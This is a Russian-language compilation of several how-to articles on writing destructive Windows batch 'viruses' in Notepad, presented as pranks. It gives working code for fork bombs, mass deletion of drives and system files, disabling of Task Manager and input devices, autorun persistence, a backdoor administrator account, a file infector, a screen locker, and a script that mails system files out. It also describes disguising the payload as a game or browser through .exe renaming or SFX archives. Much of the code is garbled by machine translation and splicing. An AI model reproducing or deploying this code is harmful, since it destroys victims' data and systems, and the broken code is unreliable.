Здравствуй, дорогой читатель/читательница. Если ты читаешь эту статью, значит тебе захотелось немножко разыграть своего друга или знакомого. Здесь ты прочитаешь, как создать свой безобидный
вирус с расширением .bat.
Предупреждаю: все описанные здесь примеры должны использоваться строго в законных целях. Автор этой статьи и администрация сайта за причиненный Вами ущерб ответственности не несёт! D:<
Короче говоря, сначала рассмотрим, что же такое в сущности, этот таинственный bat-файл, или в компьютерном сленге, батник.
Википедия гласит
:
Пакетный файл (англ. batch file) — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд, предназначенных для исполнения командным интерпретатором. После запуска пакетного файла программа-интерпретатор (как правило, COMMAND. COM или cmd.exe) читает его строка за строкой и последовательно исполняет команды. Пакетный файл — аналог скриптовых файлов командной строки (shell script) в Unix-подобных операционных системах.
Проще говоря, это аналог командной строки.
Конечно, команд там разных много, но нам потребуется лишь несколько. Впринципе, если Вы хотите сделать этот вирус один раз и не вдаваться в подробности, то запоминать их и не надо.
Общий принцип создания bat-файлов очень прост. Их можно создавать даже через Блокнот.
- Открываем Блокнот
- Пишем @echo off
- Дальше пишем или копируем туда наш код
- Выбираем в левом верхнем углу “Сохранить как.”
- По умолчанию, все файлы сохраняются как .txt. Нас же это не устраивает.
Выбираем вместо “текстовые документы” “все файлы”, пишем имя файла.bat и сохраняем.
В итоге должно получиться вот так
А затем вот так
Но если вы хотите быть коварными до конца, поменяйте у пакетного файла расширение на .exe, поставьте ему иконку, на которую пользователь захочет нажать, и, конечно, поменяйте название на название его любимой игры или браузера.
В общем, решайте сами. Фантазия тут неограничена.
Теперь, собственно, сам код.
start %0 %0 При активации данного “недовируса” появляется бесчисленное множество командных строк и компьютер гарантированно виснет. Убить процесс можно лишь через перезагрузку компьютера. На моём ноуте с объемом оперативной памяти 16 Гб глюков не наблюдалось лишь первые 3 секунды. Потом он намертво завис.
Называется такой тип вируса “форк-бомба”. Опять-таки, читайте в Википедии
🙂
time 0:00 >nul Данный вирус сбивает время на компьютере. Дёшево и сердито. И максимально безобидно.
del ** /q Удаляет все ярлыки с рабочего стола. Уже не так безобидно, но еще не катастрофа.
del "%SystemRoot%\Cursors\*.*" >nul Удаляет все курсоры. Пользователь дезориентирован.
shutdown -l -t 1 -c "Электрик ушёл в запой." -f >nul Вырубает компьютер через 1 секунду, во время которой пользователь читает сообщение в кавычках.
msg * "Программу съел червяк." >nul Выводит на экран сообщение с кнопкой ОК
Наконец, вирус можно сделать самоуничтожающимся, чтобы пользователь долго гадал, почему у него нет курсоров, например:
del "%0" >nul (Команду для самоуничтожения вируса нужно писать после самого вируса). Например
Ну, собственно, и всё. С батниками можно сделать еще очень много чего интересного, но новичкам, я думаю, хватит и этого. И еще раз предупреждаю: не надо разыгрывать людей со слабой психикой, А ТО КАК ТРЕСНУТ!
До скорого, мои хакеры)
Создание вирусов в блокноте
BLACK CODE
Всем привет! Это канал BLACK CODE. Сегодня мы рассмотрим такой феномен, как .bat вирусы, которые можно написать прямо в блокноте.
У всех есть блокнот/текстовый редактор, но как вы его используете? Думаю, что многие используют его для довольно привычных целей: заметки, текст и т.д.
Но не все знают, что в блокноте можно и написать простые вирусы, которые будут в формате .bat.
Важно понимать, что серьёзные вирусы вы не напишите, потому что команды довольно ограничены и по другим факторам. Мы пишем только в чисто образовательных целях!
Теория
Что такое .bat/Как создать .bat
Пакетный файл
(.bat файл) — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд, предназначенных для исполнения командным интерпретатором. После запуска пакетного файла программа-интерпретатор читает его строка за строкой и последовательно исполняет команды.
Для того, чтобы создать .bat файл, вам нужно:
- Открыть блокнот(или любой другой текстовый редактор)
- Написать там нужные команды
- Сохранить файл с расширением .bat(Пример: blackcode_virus.bat)
И если нужно, то и запустить
Основные команды
Пишем вирусы
Простые вирусы
Убирает рабочий стол
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REGDWORD /d 1 /f >nul
@echo off shutdown -s -t 1 -c "BLACK CODE" >nul
@echo off shutdown -r -t 1 -c "BLACK CODE" >nul
Запрещает запускать программы
@echo off reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REGDWORD /d %SystemRoot%\explorer.exe /f >nul
@echo off del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Удаляет звуки
Windows
@echo off del "%SystemRoot%\Media" /q >nul
Запрещает заходить в панель управления
@echo off reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
Запрещает комбинацию Ctrl-Alt-Delete
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REGORD /d 1 /f >nul
Меняет местами значение кнопок мыши
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Удаляет курсор мыши
del "%SystemRoot%Cursors*.*" >nul
Меняет название корзины
reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
Убирает панель управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REGD /d 1 /f
Серьёзные вирусы
Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
rd [БукваДиск]: /s /q
Удаляет все файлы в program files
del c:Program Files/q
Убивает процесс explorer.exe
taskkill /f /im explorer.exe >nul
Создает миллион папок
FOR /L %%i IN (1,1,1000000) DO md %%i
Удаляет все драйвера, которые установлены на компьютере
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
Удаляет команду DEL
del %0
Будет открывать бесконечно Paint
@Echo off :x Start mspaint goto x
Изменяет расширение всех ярлыков на .blackcode
assoc .lnk=.blackcode
copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REGSZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul
@echo offchcp 1251 net user SUPPORT_3388945a0 /delete net user hacker hack /add net localgroup Администраторы hacker /add net localgroup Пользователи SUPPORT8945a0 /del reg add "HKEY_LOCLOCALINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
Сбой системы – выключить все функции ввода-вывода (клавиатура, дисплей, мышь)! В результате будет черный экран с курсором и не реагирующая система, однако Windows продолжает работать.
rundll32 user,disableoemlayer
Меняет местами кнопки мыши, но нельзя
поменять обратно
rundll32 user,SwapMouseButton
Удаляет ядро системы
del %systemroot%\system32\HAL.dll
Заражает .jpg *.mp3 *.doc *.html *.xls.
@echo off%[MrWeb]% if '%1=='In_ goto MrWebin if exist c:\MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find "MrWeb"<%0>c:\MrWeb.bat attrib +h c:\MrWeb.bat :MrWebru for %%g in (.\.jpg .\*.doc .\tm? *.jp.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben :MrWebin if exist %2.bat goto MrWeben type c:\MrWeb.bat>>%2.bat echo start %2>>%2.bat%[MrWeb]% :MrWeben
Вирус заражает *. JPG в текущем каталоге
@echo off%[MrWeb]% if '%1=='In_ goto MrWebin if exist c:\MrWeb.bat goto MrWebru if not exist %0 goto MrWeben find "MrWeb"<%0>c:\MrWeb.bat attrib +h c:\MrWeb.bat :MrWebru for %%g in () do call c:\MrWeb In_ %%g goto MrWeben :MrWebin if exist %2.bat goto MrWeben type c:\MrWeb.bat>>%2.bat echo start %2>>%2.bat%[MrWeb]% :MrWeben
Жестокие вирусы
У пользователя будет очень сильно тормозить компьютер
@echo off echo Set fso = CreateObject("Scripting. FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso. CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx. WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO. DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v systemhostrun /t REG_SSZ /d %systemdrive%\windows\system32\rundll32.vbs /f Вирус, который убивает Windows. Не проверяйте на своем компьютере!
@echo This virus created by LIZA
@echo Virus: pcforumhack.ru™ Virus
@echo Autor: LIZA
@echo off
echo Chr> %temp%\temp1.vbs
echo Chr> %temp%\temp2.vbs
echo on error resume next > %temp%\temp.vbs
echo Set S = CreateObject("Wscript. Shell") > > %temp%\temp.vbs
echo set FSO=createobject("scripting.filesystemobject")> > %temp%\temp.vbs
reg add HKEYERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USEUSERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
copy %¶§% %SystemRoot%\user32dll.bat
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REGD /d 67108863 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORDDWORD /d 67108863 /f
echo fso.deletefile "C:\ntldr",1 > > %temp%\temp.vbs
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Featureachine_LockdowLockdown" /v "IEExplorer" /d 0 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
echo fso.deletefolder "D:\Windows",1 > > %temp%\temp.vbs
echo fso.deletefolder "I:\Windows",1 > > %temp%\temp.vbs
echo fso.deletefolder "C:\Windows",1 > > %temp%\temp.vbs
эхо ср=с. RegRead("HKEYCHINE\SMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") > > %temp%\temp.vbs
echo fso.deletefile sr+"\system32\hal.dll",1 > > %temp%\temp.vbs
эхо ср=с. RegRead("HKEYINE\SOFMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") > > %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\dllcache",1 > > %temp%\temp.vbs
эхо ср=с. RegRead("HKEYE\SOFTWMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") > > %temp%\temp.vbs
echo fso.deletefolder sr+"\system32\drives",1 > > %temp%\temp.vbs
echo s.regwrite "HKEYLSID\{645ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™"> > %temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™"> > %temp%\temp.vbs
echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™"> > %temp%\temp.vbs
эхо при ошибке возобновление далее > %temp%\temp1.vbs
echo set FSO=createobject("scripting.filesystemobject")> > %temp%\temp1.vbs
эхо сделать> > %temp%\temp1.vbs
echo fso.getfile("A:\")> > %temp%\temp1.vbs
эхо-цикл> > %temp%\temp1.vbs
эхо при ошибке возобновление далее > %temp%\temp2.vbs
echo Set S = CreateObject("Wscript.Shell") > > %temp%\temp2.vbs
эхо сделать> > %temp%\temp2.vbs
echo выполнить"S. Запустить""%comspec% /c echo "" & Chr(7), 0, True"> > %temp%\temp2.vbs
цикл эха> > %temp%\temp2.vbs
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REGeg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
красноеDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
reg DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REGdd "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D } /t REG_DWORD /d 1 /f
reg adDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
reg добавить DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REGhkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
reg добавить "hDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REGcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
reg добавить "hkcDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
reg добавить "hkcu\DWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REGoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
reg добавить "hkcu\SoDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REGtware\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
reg добавить "hkcu\SoftDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REGare\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg добавить "hkcu\SoftwaDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REGe\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
reg добавить "hkcu\SoftwareDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REGMicrosoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
reg добавить "hkcu\Software\MDWORD /d 1 /f
reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REGteobject("shell.application")> > %temp%\temp.vbs
эхо-приложение.минимизировать> > %temp%\temp.vbs
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /fSZ /d rundll32 user32, SwapMouseButton /f
запустить rundll32 user32, SwapMouseButton
reg добавить "HKCR\exefile\shell\open\command" /ve /t REG\temp.vbs
echo while i^> 0 или i^ > %temp%\temp.vbs
echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 > > %temp%\temp.vbs
эхо i=i-1 > > %temp%\temp.vbs
эхо венд > > %temp%\temp.vbs
эхо сделать > > %temp%\temp.vbs
эхо wscript.sleep 200 > > %temp%\temp.vbs
echo s.sendkeys"{capslock}" > > %temp%\temp.vbs
эхо wscript.sleep 200 > > %temp%\temp.vbs
echo s.sendkeys"{numlock}" > > %temp%\temp.vbs
эхо wscript.sleep 200 > > %temp%\temp.vbs
echo s.sendkeys"{scrolllock}" > > %temp%\temp.vbs
эхо-цикл> > %temp%\temp.vbs
echo Установить oWMP = CreateObject("WMPlayer.OCX.7") > > %temp%\temp.vbs
echo Установить colCDROMs = oWMP.cdromCollection > > %temp%\temp.vbs
эхо, если colCDROM. Подсчитайте ^> = 1, затем > > %temp%\temp.vbs
echo Для i = 0 в colCDROM. Количество - 1 > > %temp%\temp.vbs
повторить colCDROM. Элемент(i).eject > > %temp%\temp.vbs
эхо далее > > %temp%\temp.vbs
эхо Конец Если > > %temp%\temp.vbs
echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", ".", "Копм заражен; ") >> %temp%\temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
echo Set iMsg = CreateObject("CDO. Message") >> %temp%\temp.vbs
echo Set iConf = CreateObject("CDO. Configuration") >> %temp%\temp.vbs
echo Set Flds = iConf. Fields >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
echo Flds. Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
echo Flds. Update >> %temp%\temp.vbs
echo iMsg. Configuration = iConf >> %temp%\temp.vbs
echo iMsg. To = strTo >> %temp%\temp.vbs
echo iMsg. From = strFrom >> %temp%\temp.vbs
echo iMsg. Subject = strSubject >> %temp%\temp.vbs
echo iMsg. TextBody = strBody >> %temp%\temp.vbs
echo iMsg. AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
echo iMsg. Send >> %temp%\temp.vbs
echo End Function >> %temp%\temp.vbs
echo Set iMsg = Nothing >> %temp%\temp.vbs
echo Set iConf = Nothing >> %temp%\temp.vbs
echo Set Flds = Nothing >> %temp%\temp.vbs
echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
start %temp%\temp.vbs
start %temp%\temp1.vbs
start %temp%\temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows, даже в безопасном режиме! Выключает диспетчер задач.
@echo off CHCP 1251 cls Set Yvaga=На вашем компьютере найден вирус. Set pass=Пароль Set pas=Введите пароль. Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль Set dim=Выключаю вирус. title Внимание!!! CHCP 866 IF EXIST C:\windows\boot.bat ( goto ok ) cls IF NOT EXIST C:\windows\boot.bat ( ECHO Windows Registry Editor Version 5.00 >> C:\0.reg ECHO. >> C:\0.reg ECHO [HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg ECHO. >> C:\0.reg ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg start/wait regedit -s C:\0.reg del C:\0.reg ECHO @echo off >>C:\windows\boot.bat ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DDWORD /d 1 /f >>C:\windows\boot.bat ECHO start sys.bat >>C:\windows\boot.bat attrib +r +a +s +h C:\windows\boot.bat copy virus.bat c:\windows\sys.bat attrib +r +a +s +h C:\windows\sys.bat GOTO end) :ok cls Echo %Yvaga% echo. echo %virus% echo %pas% set /a choise = 0 set /p choise=%pass%: if "%choise%" == "101" goto gold if "%choise%" == "200393" goto status exit :status echo %dim% attrib -r -a -s -h C:\windows\boot.bat del C:\windows\boot.bat attrib -r -a -s -h C:\windows\sys.bat del C:\windows\sys.bat cls :gold start C:\ :end
Добавляет программу в автозагрузку ОС
copy ""%0"" "%SystemRoot%\system32\File.bat" reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG /d "%SystemRoot%\system32\File.bat" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус блокирует все программы, но интернет работает, переименовывает все .exe в .blackcode
@Echo off Echo BLACK VIRUS Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat :abc md BLACK md CODE md BLACK1 md CODE1 Label E: BLACK assoc .exe=.blackcode del c:Program Files/q Echo BLACK CODE
Отключение мыши и клавиатуры, форматирование всех дисков
@Echo off rundll32 keyboard,disable rundll32 mouse,disable ipconfig /release msg* "BLACK CODE" del D:\.* /f /s /q del E:\.* /f /s /q del F:\*.* /f /s /q del G:\ /f /s /q del H:\*.* .* /f /s /q del I:\f /s /q del J:\*.* /f /s /q exit
Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat.
Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.
Итак, как я уже говорил, сценарий имеет расширение *.bat и является текстовым файлом, значит:
1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек);
2. Сохраняем с любым именем и расширением *.bat;
3. Открываем файл и видим что открылся Диспетчер задач.
Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.
Далее напишем программку, которая создает подпапку в папке, где находится сама, а затем копирует себя на флешку, если та вставлена. Итак создаем .bat -файл следующего содержания:
md folder
copy%0 F:\program.bat
Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program.bat» содержащий текст нашей программы.
Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):
Используя полученные знания, мы можем написать такие вредоносные программки:
1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:
time 14:13
date 11.07.12
copy %0 C:\date.bat
copy %0 F:\date.bat
2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:
del F:\ *.* /q
label F:error
copy %0 F:\deleter.bat
3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:
del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q
Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *.exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».
В наших вирусах мы можем использовать еще такие скрипты:
1. Меняет клавиши мыши местами:
2. Открывает выбранную программу до полного зависания компьютера:
😡 ;
Start mspaint
goto x ;
3. Добавляет наш вирус в автозапуск (!):
copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Теперь имеем достаточно знаний для написания простеньких вирусов. Напоследок напомню, что писать вирусы это не очень хорошо и я надеюсь что читали вы эту статью исключительно из любопытства. Но, тем не менее удачи!!! 😉
Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.
Пишем вирус в блокноте
Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:
- Открываем « Компьютер
« - Заходим верхнее в меню « Сервис
«, если не видно жмем ALT - В этом меню заходим в « Сервис
» выбираем пункт « Параметры папок
« - Заходим во вкладку « Вид
» и ищем пункт « Скрывать расширения для зарегистрированных типов файлов
« - Убираем
галочку с этого пункта.
С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку « system32\drivers\etc
» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!
Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)
С чего начать
Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.
- Первым делом открываем блокнот;
- Заносим туда команды, т.е. создаём в нём «тело» вируса;
- Сохраняем свой труд через Файл -> Сохранить как
; - Теперь осталось изменить расширение файла .
txt
на .
bat
и, вместо сохранённого названия, вписать нужное, которое будет использоваться.
Создаём первый файл-вирус
Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.
Начинаем разбираться по порядку с первой строки:
- @
Echo
off
– без этой команды всё, что написано, высвечивалось бы на экране монитора. - Date11.14
– указывает на дату создания. - If
exist
c:
sky.
bat
goto
abc
– проверка существования на диске С файла sky.bat и если его нет - Copy %0 c:sk
y.bat
– размножает себя, изменив первоначальное имя файла на sky.bat - Attrib +
h
c:
sky.
bat
– скрывает созданный файл от посторонних глаз. - Echo
c:
sky.
bat >>
autoexec.
bat
– вирус прописывается в автозагрузку. - :
abc
– если он есть, выполнение программы перейдёт сюда.
Далее идут небольшие шалости:
- md
CRECK
– создаёт нужную или ненужную папку, смотря какая цель у создателя вируса. - md
NEW
– такими папками можно заполнить весь жёсткий диск у пользователя. - Label
E:
LUZER
– прописывает название логического диска Е. В данном случае LUZER. - assoc .
exe=.
mp3
– расширение .exe будет ассоциироваться, как .mp - del c:Program Files /q
–всё, что было в папке Program Files удалится. - del *.* /q
– из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.
Повеселились достаточно, подумаем и о законе:
- del %0
– вирус наделает дел и удалит сам себя.
Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.
